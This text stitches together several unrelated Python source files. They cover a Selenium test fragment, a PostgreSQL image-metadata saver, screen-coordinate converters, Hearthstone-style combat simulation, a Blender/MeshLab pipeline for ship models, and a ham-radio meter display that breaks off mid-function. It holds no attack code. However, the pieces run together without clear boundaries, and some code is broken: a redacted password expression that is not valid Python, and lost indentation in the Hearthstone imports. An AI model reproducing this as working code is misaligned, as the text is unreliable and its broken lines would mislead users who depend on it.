        # the user clicks the delete button on the page. They see a modal pop up asking them to confirm their decision.
        page.delete_button.click()
        self.wait_for_modal_to_be_visible(page.modal_id)
        # the user decides not to delete the watering station and clicks cancel and the modal disappears. They then
        # quickly change their mind and proceed to delete the watering station.
        page.cancel_button.click()
        self.wait_for_model_to_disappear(page.modal_id)
        page.delete_button.click()
        self.wait_for_modal_to_be_visible(page.modal_id)
        page.confirm_delete_button.click()

    def ws_status_to_bool(self, status):
        # Map the table's status text back to a boolean.
        return True if status == WateringStationFormatter.ACTIVE_STATUS_STR else False
|
#
from modules import ilmodule
import time
import uuid
import json
import os
import psycopg2
import psycopg2.extras
from psycopg2 import pool
import globals
#
# Module for saving data to database
#
class Database(ilmodule.ILModule):
    """Persists image metadata into the PostgreSQL ``image_lib`` table.

    Subscribes to TOPIC_SAVEDB on the message bus and writes one row per
    received image-metadata JSON document, using a small threaded
    connection pool.
    """
    def __init__(self):
        super().__init__()
        minConnection = 1
        maxConnection = 2
        # NOTE(review): '<PASSWORD>("<PASSWORD>")' is a redaction
        # placeholder left by the export — presumably os.getenv("PGPASSWORD").
        self.connectionPool = psycopg2.pool.ThreadedConnectionPool(
            minConnection,
            maxConnection,
            user=os.getenv("PGUSER"),
            password=<PASSWORD>("<PASSWORD>"),
            host=os.getenv("PGHOST"),
            port=os.getenv("PGPORT"),
            database=os.getenv("PGDATABASE"),
        )
        if self.connectionPool:
            print("DB Connection pool created successfully")
        # By default DO NOT save DUPLICATES!
        self.saveDuplicateImageData = False
        self.getMessageBus().subscribe(self.onMessage, globals.TOPIC_SAVEDB)

    def onMessage(self, arg):
        """Message-bus callback: persist the received image metadata."""
        self.getLogger().debug("Received database save request")
        self.saveImageData(arg)
        # self.getMessageBus().sendMessage(globals.TOPIC_???????, arg=metadata)

    #
    # Save image metadata to PostgreSQL database
    #
    def saveImageData(self, imageDataJSON):
        """Insert one image's metadata row into ``image_lib``.

        When duplicate saving is disabled, any existing row with the same
        file hash is deleted first. Rolls back and re-raises on failure;
        the pooled connection is always returned.
        """
        dbConnection = self.connectionPool.getconn()
        try:
            dbCursor = dbConnection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
            # Delete old data, if exists
            imageSha256 = imageDataJSON["hash"]
            if not self.saveDuplicateImageData:
                # left(filehash, 2) presumably matches a prefix index on the
                # column — confirm against the table's schema.
                dbCursor.execute(
                    "DELETE FROM image_lib WHERE left(filehash, 2)=%s AND filehash=%s",
                    (imageSha256[:2], imageSha256),
                )
            # GPS coordinates are optional; store NULL when missing/empty.
            if "GPSLatitude" in imageDataJSON["gps"] and imageDataJSON["gps"]["GPSLatitude"]:
                GPSLatitude = imageDataJSON["gps"]["GPSLatitude"]
            else:
                GPSLatitude = None
            if "GPSLongitude" in imageDataJSON["gps"] and imageDataJSON["gps"]["GPSLongitude"]:
                GPSLongitude = imageDataJSON["gps"]["GPSLongitude"]
            else:
                GPSLongitude = None
            address = {}
            if "address" in imageDataJSON:
                address = imageDataJSON["address"]
            display_name = ""
            if "display_name" in imageDataJSON:
                display_name = imageDataJSON["display_name"]
            thumbnailBytes = self.get_bytes_from_file(imageDataJSON["thumbnail_path"])
            originalname = os.path.basename(imageDataJSON["image_path"])
            # Convert the EXIF-style "YYYY:MM:DD HH:MM:SS" timestamp into
            # an ISO-ish string PostgreSQL accepts for timestamp columns.
            fullDate = None
            if imageDataJSON["dateOfImage"]:
                d = time.strptime(imageDataJSON["dateOfImage"], "%Y:%m:%d %H:%M:%S")
                fullDate = time.strftime('%Y-%m-%d %H:%M:%S', d)
            imageYear = None
            imageMonth = None
            imageDay = None
            # NOTE(review): imageYear/Month/Day are always inserted as NULL
            # even when the date parsed successfully — looks unintended;
            # confirm whether they should come from the parsed struct_time.
            # Generate GUID for DB record
            guid = uuid.uuid1()
            dbCursor.execute(
                "INSERT INTO image_lib (guid, filehash, gpsdata, exifdata, latitude, longitude, address, address_full, faces, tags, originalname, description, thumbnail, imagedate, taken_at, imageyear, imagemonth, imageday) VALUES ("
                "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
                (
                    str(guid),
                    str(imageSha256),
                    json.dumps(imageDataJSON["gps"]),
                    json.dumps(imageDataJSON["EXIF"]),
                    GPSLatitude,
                    GPSLongitude,
                    json.dumps(address),
                    display_name,
                    json.dumps(imageDataJSON["faces"]),
                    json.dumps(imageDataJSON["tags"]),
                    originalname,
                    imageDataJSON["description"],
                    thumbnailBytes,
                    fullDate,
                    fullDate,
                    imageYear,
                    imageMonth,
                    imageDay,
                ),
            )
            dbConnection.commit()
            dbCursor.close()
            print("Data saved with GUID: " + str(guid))
        except Exception as e:
            dbConnection.rollback()
            # log.error("{} error: {}".format(func.__name__, e))
            print(e)
            # Throw exception to caller
            raise e
        finally:
            # Always hand the connection back to the pool.
            self.connectionPool.putconn(dbConnection)
        return
# -*- coding: UTF-8 -*-
def transfer_image_coordinate_to_display(pt, image_size, display_size, display_orientation):
    """Map a point from image coordinates to display (screen) coordinates.

    The display origin moves as the screen rotates, so the mapping depends
    on *display_orientation* (0-3, multiples of 90 degrees).

    Args: target point in image coordinates, (image_w, image_h),
          (display_w, display_h), display orientation 0/1/2/3.
    Returns: the point in display coordinates.
    """
    fx = 1.0 * pt[0] / image_size[0]
    fy = 1.0 * pt[1] / image_size[1]
    dw, dh = display_size[0], display_size[1]
    if display_orientation == 0:
        return (fx * dw, fy * dh)
    if display_orientation == 1:
        return (fy * dw, dh - fx * dh)
    if display_orientation == 2:  # untested
        return (dw - fx * dw, dh - fy * dh)
    # display_orientation == 3
    return (dw - fy * dw, fx * dh)
def transfer_display_coordinate_to_image(pt, display_size , display_orientation ,image_size):
    """Map a point from display (screen) coordinates back to image coordinates.

    Inverse of transfer_image_coordinate_to_display; the display origin
    moves with the screen rotation (*display_orientation* is 0-3).

    Args: target point in display coordinates, (display_w, display_h),
          display orientation 0/1/2/3, (image_w, image_h).
    Returns: the point in image coordinates.
    """
    fx = 1.0 * pt[0] / display_size[0]
    fy = 1.0 * pt[1] / display_size[1]
    iw, ih = image_size[0], image_size[1]
    if display_orientation == 0:
        return (fx * iw, fy * ih)
    if display_orientation == 1:
        return (iw - fy * iw, fx * ih)
    if display_orientation == 2:  # untested
        return (iw - fx * iw, ih - fy * ih)
    # display_orientation == 3
    return (fy * iw, ih - fx * ih)
def transfer_image_coordinate_list_to_display(pts, image_size, display_size, display_orientation):
    """Map a list of image-coordinate points to display coordinates.

    Applies transfer_image_coordinate_to_display to each point; the
    display origin moves with the screen rotation (orientation 0-3).
    """
    return [
        transfer_image_coordinate_to_display(pt, image_size, display_size, display_orientation)
        for pt in pts
    ]
def transfer_display_coordinate_list_to_image(pts, display_size, display_orientation, image_size):
    """Map display-coordinate points back to image coordinates.

    Applies transfer_display_coordinate_to_image to each point and
    truncates the results to integer pixel coordinates.
    """
    converted = (
        transfer_display_coordinate_to_image(pt, display_size, display_orientation, image_size)
        for pt in pts
    )
    return [(int(px), int(py)) for px, py in converted]
|
import copy
import logging
import typing
from typing import Optional, List
from hearthstone.events import CombatPhaseContext, EVENTS
from hearthstone.cards import CardEvent
if typing.TYPE_CHECKING:
from hearthstone.player import Player
from hearthstone.randomizer import Randomizer
from hearthstone.cards import Card, MonsterCard
logger = logging.getLogger(__name__)
class WarParty:
    # (HalfBoard)
    """One player's half of the combat board.

    The board is a snapshot (shallow copies) of the player's in-play
    cards, so combat cannot mutate the originals.
    """
    def __init__(self, player: 'Player'):
        self.owner = player
        self.board = [copy.copy(card) for card in player.in_play]
        # Index of the next monster in the attack rotation.
        self.next_attacker_idx = 0

    def find_next(self) -> Optional['MonsterCard']:
        """Return the next monster to fight and advance the rotation.

        Must be called after the active player's monster fights, and also
        after a monster dies from combat if it was the active monster.
        Take care not to call this twice after a monster dies fighting.
        Returns None when no living, attack-capable monster remains,
        meaning the player has lost the round (handle the case where both
        players die in the same fight action).
        """
        num_cards = len(self.board)
        for offset in range(0, num_cards):
            index = (self.next_attacker_idx + offset) % num_cards
            if not self.board[index].dead and not self.board[index].cant_attack:
                self.next_attacker_idx = index + 1
                return self.board[index]
        return None

    def get_random_monster(self, randomizer: 'Randomizer') -> Optional['MonsterCard']:
        """Pick an attack target: taunt minions first, else any living one."""
        taunt_monsters = [card for card in self.board if not card.dead and card.taunt]
        if taunt_monsters:
            return randomizer.select_attack_target(taunt_monsters)
        all_monsters = [card for card in self.board if not card.dead]
        if all_monsters:
            return randomizer.select_attack_target(all_monsters)
        return None

    def num_cards(self):
        """Number of cards on this half-board (dead ones included)."""
        return len(self.board)

    def summon_in_combat(self, monster: 'MonsterCard', context: CombatPhaseContext, index: Optional[int] = None):
        """Add *monster* to the friendly war party mid-combat.

        Does nothing when the board is already at its maximum size. When
        *index* is None the monster is appended. (The original tested
        ``if not index:``, which wrongly treated an explicit index of 0 as
        "unspecified" and appended instead of inserting at the front.)
        """
        live_monsters_num = len([card for card in context.friendly_war_party.board if not card.dead])
        max_board_size = context.friendly_war_party.owner.maximum_board_size
        if live_monsters_num >= max_board_size:
            return
        if index is None:
            index = len(context.friendly_war_party.board)
        context.friendly_war_party.board.insert(index, monster)
        # Keep the attack rotation pointing at the same monster when the
        # insertion happens before it.
        if index < context.friendly_war_party.next_attacker_idx:
            context.friendly_war_party.next_attacker_idx += 1
        context.broadcast_combat_event(CardEvent(monster, EVENTS.SUMMON_COMBAT))

    def get_index(self, card):
        """Position of *card* on this half-board."""
        return self.board.index(card)

    def attackers(self) -> List['Card']:
        """All living monsters that are able to attack."""
        return [board_member for board_member in self.board if not board_member.dead and not board_member.cant_attack]
def fight_boards(war_party_1: 'WarParty', war_party_2: 'WarParty', randomizer: 'Randomizer'):
    """Resolve one full combat between two half boards, then deal player damage.

    The first attacker is not randomized here: callers are expected to pass
    the war parties in a pre-shuffled order (e.g. by shuffling players in the
    combat step). The boards are copies, so the players' real in-play state
    cannot be changed during combat.
    """
    logger.debug(f"{war_party_1.owner.name}'s board is {war_party_1.board}")
    logger.debug(f"{war_party_2.owner.name}'s board is {war_party_2.board}")
    # The side with more minions strikes first; ties keep the given order.
    if war_party_2.num_cards() > war_party_1.num_cards():
        attacker_side, defender_side = war_party_2, war_party_1
    else:
        attacker_side, defender_side = war_party_1, war_party_2
    # Which party counts as "friendly" is irrelevant for this broadcast.
    start_combat_event = CardEvent(None, EVENTS.COMBAT_START)
    CombatPhaseContext(war_party_1, war_party_2, randomizer).broadcast_combat_event(start_combat_event)
    for _ in range(100):  # hard cap guarantees termination
        attacker = attacker_side.find_next()
        defender = defender_side.get_random_monster(randomizer)
        logger.debug(f'{attacker_side.owner.name} is attacking {defender_side.owner.name}')
        if not defender:
            # Defending side has nothing left to hit: combat ends.
            break
        if attacker:
            start_attack(attacker, defender, attacker_side, defender_side, randomizer)
        elif not defender_side.attackers():
            # Neither side can attack any more: combat ends.
            break
        attacker_side, defender_side = defender_side, attacker_side
    damage(war_party_1, war_party_2)
def damage(half_board_1: 'WarParty', half_board_2: 'WarParty'):
    """Apply end-of-combat damage to the losing player.

    The loser takes the sum of the winner's surviving minion tiers plus the
    winner's tavern tier. If both sides (or neither side) still have living
    minions, the fight is a draw and no damage is dealt.
    """
    surviving_tiers_1 = sum(card.tier for card in half_board_1.board if not card.dead)
    surviving_tiers_2 = sum(card.tier for card in half_board_2.board if not card.dead)
    if surviving_tiers_1 > 0 and surviving_tiers_2 > 0:
        # Both players still have minions on board: draw.
        logger.debug('neither player won (both players have minions left)')
    elif surviving_tiers_1 > 0:
        logger.debug(f'{half_board_1.owner.name} has won the fight')
        half_board_2.owner.health -= surviving_tiers_1 + half_board_1.owner.tavern_tier
    elif surviving_tiers_2 > 0:
        logger.debug(f'{half_board_2.owner.name} has won the fight')
        half_board_1.owner.health -= surviving_tiers_2 + half_board_2.owner.tavern_tier
    else:
        logger.debug('neither player won (no minions left)')
def start_attack(attacker: 'MonsterCard', defender: 'MonsterCard', attacking_war_party: 'WarParty', defending_war_party: 'WarParty',
                 randomizer: 'Randomizer'):
    """Resolve a single attack: broadcast triggers, trade damage, resolve deaths."""
    logger.debug(f'{attacker} is attacking {defender}')
    context = CombatPhaseContext(attacking_war_party, defending_war_party, randomizer)
    # "On attack" triggers fire before any damage is exchanged.
    context.broadcast_combat_event(CardEvent(attacker, EVENTS.ON_ATTACK))
    # Both minions strike each other.
    attacker.take_damage(defender.attack, context)
    defender.take_damage(attacker.attack, context)
    # "After attack" triggers fire once damage has been exchanged.
    context.broadcast_combat_event(CardEvent(attacker, EVENTS.AFTER_ATTACK))
    # Deaths are resolved from each party's own (friendly) perspective.
    attacker.resolve_death(CombatPhaseContext(attacking_war_party, defending_war_party, randomizer))
    defender.resolve_death(CombatPhaseContext(defending_war_party, attacking_war_party, randomizer))
    logger.debug(f'{attacker} has just attacked {defender}')
|
#!/usr/bin/env python3
#
# Plan 1: Automated ship model download and processing
# 1) Download Fleet VieweR Star Citizen Ships 3D Models - Data as csv
# 2) For each "Download Model Path Remote"
# 2.1) Download .ctm file
# 2.2) Read MeshLab settings and determine which "original_to_LOD0.mlx" to use
# 2.3) meshlabserver.exe -i filename.ctm -o filename_fv_LOD0.obj -s original_to_LOD0.mlx
# Transform: Scale, Normalize: Scale to Unit bbox true
# Remove Duplicate Vertices
# Remove Unreferenced Vertices
# Re-Compute Face Normals
# [Optional] Invert Faces Orientation
# 2.4) meshlabserver.exe -i filename_fv_LOD0.obj -o filename_fv_LOD1.obj -s LOD0_to_LOD1.mlx
# Ambient Occlusion
# Select by Vertext Quality: min:0, max:0.0001
# Delete Selected Faces
# Remove Unreferenced Vertices
# 3)
#
#
# Requires MeshLab installed
# http://www.meshlab.net/#download
#
# Required Blender Setup:
# cd /your/path/to/blender/python/bin
# curl -O https://bootstrap.pypa.io/get-pip.py
# chmod +x get-pip.py
# ./python3.5m get-pip.py
# ./python3.5m pip install requests
# ./python3.5m pip install cachecontrol
# ./python3.5m pip install lockfile
#
# Google Sheets document listing the Fleet VieweR ship models to process.
spreadsheetId = '1ammOh0-6BHe2hYFQ5c1pdYrLlNjVaphd5bDidcdWqRo'
# gid of the worksheet tab inside the spreadsheet (0 = first tab).
sheetId = 0
# CSV column headers expected in the exported sheet.
FIELD_MODEL_PATH_REMOTE = 'Model Path Remote'
# NOTE: this column header really contains an embedded newline in the sheet.
FIELD_MESHLAB_FORWARD_UP_NORMAL = 'MeshLab\nForward_Up_Normal'
# Path to the MeshLab command-line server (Windows default install location).
MESHLABSERVER_EXE = 'c:\\Program Files\\VCG\\MeshLab\\meshlabserver.exe'
# MacOS required hack:
# $ cd /Applications/meshlab.app/Contents/MacOS/
# $ install_name_tool -add_rpath "@executable_path/../Frameworks" meshlabserver
#MESHLABSERVER_EXE = '/Applications/meshlab.app/Contents/MacOS/meshlabserver'
import bpy
import csv
import io
import os
import subprocess
import time
import requests
from cachecontrol import CacheControl
from cachecontrol.caches.file_cache import FileCache
def execute(cmd_args, cwd=None):
    """Run an external command and echo its output.

    Args:
        cmd_args: argv-style list (executed with shell=False, so no shell
            injection risk from file names).
        cwd: optional working directory for the child process.

    Returns:
        The child's exit code (0 on success).
    """
    import sys  # local import: keeps the file's top-level imports unchanged
    print('execute(%r)' % cmd_args)
    with subprocess.Popen(cmd_args, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
        output, errors = p.communicate()
    print(output.decode("utf-8"))
    # BUG FIX: stderr was captured but silently discarded, hiding meshlab
    # failures from the log. Surface it on our own stderr.
    if errors:
        print(errors.decode("utf-8"), file=sys.stderr)
    return p.returncode
class RsiCtmToLods:
    """Pipeline for converting Star Citizen .ctm ship models into LOD sets.

    Workflow: download each model listed in the Google Sheet, convert it to
    LOD0/LOD1 .obj files via meshlabserver, build further decimated LODs in
    Blender, and export every LOD back to .obj and .ctm.

    Requires Blender's bundled Python (bpy) with requests/cachecontrol
    installed, plus a local MeshLab install at MESHLABSERVER_EXE.
    """
    def setLayers(self, scene, obj, *indices):
        # Make `obj` visible only on the given Blender layer indices.
        obj.layers = [ i in indices for i in range(len(obj.layers)) ]
    def decimate(self, scene, obj, ratio):
        # Add a Decimate modifier reducing `obj` to `ratio` of its faces.
        # Non-mesh objects are left untouched.
        if obj.type != "MESH":
            return
        modDec = obj.modifiers.new("Decimate", type = "DECIMATE")
        modDec.ratio = ratio
        # Force a scene update so the modifier takes effect immediately.
        scene.update()
    def selectLayers(self, scene, layers):
        # Make exactly the given layer mask visible in the scene.
        for i in range(len(scene.layers)):
            scene.layers[i] = layers[i]
    def selectObject(self, scene, obj):
        # Select `obj` and deselect every other object in the scene.
        for obj2 in scene.objects:
            obj2.select = obj2 == obj
    def getSession(self):
        # HTTP session with an on-disk cache so reruns can skip unchanged
        # downloads.
        return CacheControl(requests.session(), cache=FileCache('.cache'))
    def importAndProcessAll(self):
        """Download the sheet as CSV and process every unique remote model path."""
        session = self.getSession()
        response = session.get('https://docs.google.com/spreadsheets/d/%s/export?gid=%d&format=csv' % (spreadsheetId, sheetId))
        response.raise_for_status()
        #print(response.content)
        # Remote paths already handled this run; guards against duplicate rows.
        processed = []
        with io.StringIO(response.text) as buff:
            rows = csv.DictReader(buff)
            for row in rows:
                #print(row)
                pathRemote = row[FIELD_MODEL_PATH_REMOTE]
                print(' pathRemote:%r' % pathRemote)
                meshlabForwardUpNormal = row[FIELD_MESHLAB_FORWARD_UP_NORMAL]
                if not meshlabForwardUpNormal:
                    # Default orientation preset when the sheet cell is empty.
                    meshlabForwardUpNormal = 'nZ_pY_Normal'
                print(' meshlabForwardUpNormal:%r' % meshlabForwardUpNormal)
                if not pathRemote or pathRemote in processed:
                    continue
                self.importAndProcess(session, pathRemote, meshlabForwardUpNormal)
                processed.append(pathRemote)
                #break
    def importAndProcess(self, session, pathRemote, meshlabForwardUpNormal):
        """Run the full pipeline for a single remote .ctm model.

        Args:
            session: HTTP session, or None to create a fresh cached one.
            pathRemote: URL of the .ctm file to download.
            meshlabForwardUpNormal: orientation preset selecting the
                LOD0_<preset>.mlx MeshLab script (defaults to 'nZ_pY_Normal').
        """
        if not session:
            session = self.getSession()
        if not meshlabForwardUpNormal:
            meshlabForwardUpNormal = 'nZ_pY_Normal'
        print(' meshlabForwardUpNormal:%r' % meshlabForwardUpNormal)
        self.downloadCtm(session, pathRemote)
        # Base name without directory or extension, e.g. "CNOU_PIONEER".
        filename_ctm = os.path.split(pathRemote)[1]
        filename = os.path.splitext(filename_ctm)[0]
        self.meshlabProcessCtmToObj(filename, meshlabForwardUpNormal)
        self.blenderProcessObj(filename)
        self.blenderExportScene()
    def downloadCtm(self, session, pathRemote):
        """Stream-download the remote .ctm into the current directory."""
        print("Downloading %r" % pathRemote)
        filename_ctm = os.path.split(pathRemote)[1]
        # NOTE(review): `filename` is computed but unused in this method.
        filename = os.path.splitext(filename_ctm)[0]
        # TODO:(pv) Don't bother downloading or processing if response.status == 304
        response = session.get(pathRemote, stream=True)
        print('response.status_code:%d' % response.status_code)
        response.raise_for_status()
        with open(filename_ctm, 'wb') as handle:
            # 1 KiB chunks; a dot per chunk acts as a progress indicator.
            for block in response.iter_content(chunk_size=1024):
                if block:
                    print(".", end="")
                    handle.write(block)
                    handle.flush()
        print("")
    def meshlabProcessCtmToObj(self, filename, meshlabForwardUpNormal):
        """Convert <filename>.ctm to _fv_LOD0.obj and _fv_LOD1.obj via MeshLab.

        The LOD0 script is chosen by the orientation preset; the LOD1 script
        applies ambient-occlusion-based cleanup (see the header comments at
        the top of this file).
        """
        print("%r MeshLab CTM to OBJ" % filename)
        #
        # TODO:(pv) Consider using https://github.com/3DLIRIOUS/MeshLabXML
        #
        filename_ctm = filename + ".ctm"
        meshlab_script = 'LOD0_%s.mlx' % meshlabForwardUpNormal
        filename_lod0_obj = filename + '_fv_LOD0.obj'
        cmd_args = [MESHLABSERVER_EXE, "-i", filename_ctm, "-o", filename_lod0_obj, '-s', meshlab_script]
        execute(cmd_args)
        meshlab_script = 'LOD1.mlx'
        filename_lod1_obj = filename + '_fv_LOD1.obj'
        cmd_args = [MESHLABSERVER_EXE, "-i", filename_lod0_obj, "-o", filename_lod1_obj, '-s', meshlab_script]
        execute(cmd_args)
    def blenderProcessObj(self, filename):
        """Load LOD0/LOD1 into a fresh Blender scene, derive LOD2-5 by
        decimating LOD1, and save everything as <filename>.blend.

        Each LOD is parked on its own scene layer (layer index == LOD number).
        """
        print("%r Blender OBJ LODs" % filename)
        # Start from an empty file so previous models do not leak between runs.
        bpy.ops.wm.read_homefile(use_empty=True)
        scene = bpy.context.scene
        obj_lod0 = self.loadAndSetLodRatio(scene, filename, 0, None)
        obj_lod1 = self.loadAndSetLodRatio(scene, filename, 1, 0.90)
        # LOD2-5 are progressively stronger decimations of LOD1.
        obj_lod2 = self.copyAndSetLodRatio(scene, obj_lod1, 2, 0.60)
        obj_lod3 = self.copyAndSetLodRatio(scene, obj_lod1, 3, 0.30)
        obj_lod4 = self.copyAndSetLodRatio(scene, obj_lod1, 4, 0.10)
        obj_lod5 = self.copyAndSetLodRatio(scene, obj_lod1, 5, 0.05)
        bpy.ops.wm.save_as_mainfile(filepath=filename + ".blend", check_existing=False)
    def loadAndSetLodRatio(self, scene, filename, lod, ratio):
        """Import <filename>_fv_LOD<lod>.obj, place it on layer `lod`, and
        optionally decimate it to `ratio`. Returns the imported object."""
        obj_lodX_name = filename + "_fv_LOD%d" % lod
        filename_lodX = obj_lodX_name + ".obj"
        print("Blender Load %r " % filename_lodX)
        #
        # https://docs.blender.org/api/current/bpy.ops.import_scene.html#bpy.ops.import_scene.obj
        #
        bpy.ops.import_scene.obj(filepath=filename_lodX)
        obj_lodX = scene.objects[obj_lodX_name]
        self.setLayers(scene, obj_lodX, lod)
        if ratio:
            self.decimate(scene, obj_lodX, ratio)
        return obj_lodX
    def copyAndSetLodRatio(self, scene, obj, lod, ratio):
        """Duplicate `obj` (mesh included) as LOD `lod`, place it on layer
        `lod`, and decimate it to `ratio`. Returns the new object."""
        # Rebuild the name with the new LOD suffix, e.g. X_fv_LOD1 -> X_fv_LOD3.
        obj_lodX_name = obj.name[:obj.name.rfind("_fv_LOD")] + "_fv_LOD%d" % lod
        print("Blender Create %r " % obj_lodX_name)
        obj_lodX = obj.copy()
        # Deep-copy the mesh data so decimation does not affect the source LOD.
        obj_lodX.data = obj.data.copy()
        obj_lodX.animation_data_clear()
        scene.objects.link(obj_lodX)
        obj_lodX.name = obj_lodX_name
        obj_lodX.data.name = obj_lodX_name
        self.setLayers(scene, obj_lodX, lod)
        self.decimate(scene, obj_lodX, ratio)
        return obj_lodX
    def blenderExportScene(self, scene=None):
        """Export every object in the scene (defaults to the current scene)."""
        if not scene:
            scene = bpy.context.scene
        for obj in scene.objects:
            self.blenderExportObject(obj, scene)
    def blenderExportName(self, name, scene=None):
        """Export the single object called `name` from the scene."""
        if not scene:
            scene = bpy.context.scene
        self.blenderExportObject(scene.objects[name], scene)
    def blenderExportObject(self, obj, scene=None):
        """Export one object as .obj (next to the .blend file), then to .ctm."""
        if not scene:
            scene = bpy.context.scene
        print("Blender Export %r" % obj.name)
        # Only the target object's layer and selection are active, so the
        # use_selection export below writes exactly this object.
        self.selectLayers(scene, obj.layers)
        self.selectObject(scene, obj)
        blend_file_dir = os.path.dirname(bpy.data.filepath)
        filepath = os.path.join(blend_file_dir, obj.name)
        #
        # https://docs.blender.org/api/current/bpy.ops.export_scene.html#bpy.ops.export_scene.obj
        #
        bpy.ops.export_scene.obj(filepath=filepath + ".obj", check_existing=False, use_selection=True)
        self.obj2ctm(filepath)
    def obj2ctm(self, filepath):
        """Convert <filepath>.obj to <filepath>.ctm.

        Only the MeshLab branch is live (`if True:`); the ctmconv and ctypes
        branches are kept for reference but unreachable.
        """
        print("Export %r to CTM" % filepath)
        if True:
            #
            # Requires MeshLab installed
            # http://www.meshlab.net/#download
            #
            # This seems like a win/win that produces the best quality output *AND* smallest files
            #
            cwd = os.path.dirname(filepath) or None
            filename = os.path.split(filepath)[1]
            filename_obj = filename + ".obj"
            filename_ctm = filename + ".ctm"
            cmd_args = [MESHLABSERVER_EXE, "-i", filename_obj, "-o", filename_ctm]
            execute(cmd_args, cwd=cwd)
        else:
            # NOTE(review): everything below is dead code (the `if True` above
            # always takes the MeshLab path).
            filepath_obj = filepath + ".obj"
            filepath_ctm = filepath + ".ctm"
            if True:
                #
                # Requires OpenCTM SDK installed
                # http://openctm.sourceforge.net/?page=download
                # https://sourceforge.net/projects/openctm/files/OpenCTM-1.0.3/OpenCTM-1.0.3-setup.exe/download
                #
                # ERROR: The output of this command looks horrible in Unity!
                #
                cmd_args = ["ctmconv", filepath_obj, filepath_ctm, "--method", "MG1", "--level", "6"]
                execute(cmd_args)
            else:
                #
                # Requires special 64-bit build of openctm.dll placed in Blender home directory
                # https://sourceforge.net/projects/openctm/files/
                # https://sourceforge.net/projects/openctm/files/OpenCTM-1.0.3/OpenCTM-1.0.3-src.zip/download
                #
                # ERROR: Can't get this to work
                #
                # NOTE(review): `ctypes` (and the ctm* bindings) are never
                # imported in this file; this branch would raise NameError if
                # it were ever reached.
                filepath_obj = ctypes.c_char_p(filepath_obj.encode("utf-8"))
                filepath_ctm = ctypes.c_char_p(filepath_ctm.encode("utf-8"))
                try:
                    ctmIn = ctmNewContext(CTM_IMPORT)
                    ctmLoad(ctmIn, filepath_obj)
                    vertCount = ctmGetInteger(ctmIn, CTM_VERTEX_COUNT)
                    verts = ctmGetFloatArray(ctmIn, CTM_VERTICES)
                    triCount = ctmGetInteger(ctmIn, CTM_TRIANGLE_COUNT)
                    indices = ctmGetIntegerArray(ctmIn, CTM_INDICES)
                finally:
                    ctmFreeContext(ctmIn)
                try:
                    ctmOut = ctmNewContext(CTM_EXPORT)
                    ctmDefineMesh(ctmOut, verts, vertCount, indices, triCount, None)
                    ctmCompressionMethod(ctmOut, CTM_METHOD_MG1)
                    #ctmCompressionLevel(ctmOut, 9)
                    ctmSave(ctmOut, filepath_ctm)
                finally:
                    ctmFreeContext(ctmOut)
def main():
    """Script entry point: fetch the ship sheet and process every model."""
    RsiCtmToLods().importAndProcessAll()
    # Single-model debug run:
    # RsiCtmToLods().importAndProcess(None, "https://robertsspaceindustries.com/media/4qayc3taiskh3r/source/CNOU_PIONEER.ctm", None)

if __name__ == '__main__':
    main()
|
# ham_tools/cli/rig_meters.py
"""
Display meters from rigctl
Assumes rigctld is listening on localhost
"""
import os
import shutil
import socket
import sys
import time
from dataclasses import dataclass
from colorama import Cursor, Fore, Style
from colorama.ansi import clear_screen as ansi_clear_screen
# TCP port where rigctld listens (rigctld's default port).
RIGCTLD_PORT = 4532
# Polling interval. Note: It usually takes 0.1 - 0.27 seconds to read four meters
INTERVAL_S = 0.5
# Over how many seconds to calculate the max value
MAX_HOLD_TIME = 2.0
# How many samples to hold on to for calculating the max over the last MAX_HOLD_TIME seconds
MAX_SAMPLES = int(MAX_HOLD_TIME / INTERVAL_S)
# Width of the meter in characters
METER_WIDTH = 50
@dataclass
class Meter:
    """Definition of one rig meter: its name, raw value range, and unit."""

    name: str       # rigctl level name, e.g. "SWR"
    min_val: float  # raw reading that maps to 0 on the percent scale
    max_val: float  # raw reading that maps to 100 on the percent scale
    unit: str       # display unit ("" when dimensionless)

    def scale_value(self, value: float) -> int:
        """Map a raw reading from [min_val, max_val] onto [0, 100].

        The result is truncated to an int; out-of-range inputs yield values
        outside 0-100 and are clamped by the caller.
        """
        span = self.max_val - self.min_val
        scaled = (value - self.min_val) / span * 100
        return int(scaled)
# Meters polled each cycle, keyed by their rigctl level name.
# Available meters can be found with the command:
#   rigctl -r localhost get_level \?
METERS = {
    "STRENGTH": Meter("STRENGTH", -54, 60, "dB"),
    "ALC": Meter("ALC", 0.05, 0.6, ""),
    "SWR": Meter("SWR", 1, 3, ""),
    "RFPOWER_METER_WATTS": Meter("RFPOWER_METER_WATTS", 0, 100, "W"),
}
def main() -> None:
    """Poll rigctld on localhost for each configured meter and redraw forever.

    Reads every meter once per INTERVAL_S, tracks a max-hold value per meter
    over the last MAX_SAMPLES readings, and repaints the display in place.

    Raises:
        RuntimeError: if a meter value cannot be read from rigctld.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("localhost", RIGCTLD_PORT))

    # Rolling window of recent raw readings, per meter, for the max-hold.
    samples: dict[str, list[float]] = {name: [] for name in METERS.keys()}

    last_term_size = None
    while True:
        results = []
        # monotonic() is immune to wall-clock adjustments, unlike time().
        start = time.monotonic()

        # Clear the screen on startup and whenever the terminal is resized.
        term_size = shutil.get_terminal_size()
        if term_size != last_term_size:
            clear_screen()
            last_term_size = term_size

        for meter in METERS.values():
            # sendall() guarantees the whole command is written; send() may
            # do a short write on a nonblocking/busy socket.
            sock.sendall(f"\\get_level {meter.name}\n".encode())
            try:
                raw_val = float(sock.recv(32).strip())
            except Exception as e:
                # Chain the original error so the root cause stays visible.
                raise RuntimeError(f"Unable to read meters from rigctld: {e}") from e

            # Max-hold: keep only the last MAX_SAMPLES readings.
            samples[meter.name].append(raw_val)
            if len(samples[meter.name]) > MAX_SAMPLES:
                samples[meter.name].pop(0)
            max_val = max(samples[meter.name])

            results.append(
                (
                    meter,
                    raw_val,
                    max_val,
                    meter.scale_value(raw_val),
                    meter.scale_value(max_val),
                )
            )
        end = time.monotonic()
        print_meters(results)
        # Sleep whatever remains of the polling interval (never negative).
        time.sleep(max(0.0, INTERVAL_S - (end - start)))
def print_meters(results: list[tuple[Meter, float, float, int, int]]) -> None:
    """Repaint all meters at the top of the terminal.

    Each entry in `results` is (meter, raw value, max-hold value,
    scaled value 0-100, scaled max 0-100).
    """
    lines = []
    for meter, raw_val, max_val, scaled_val, scaled_max in results:
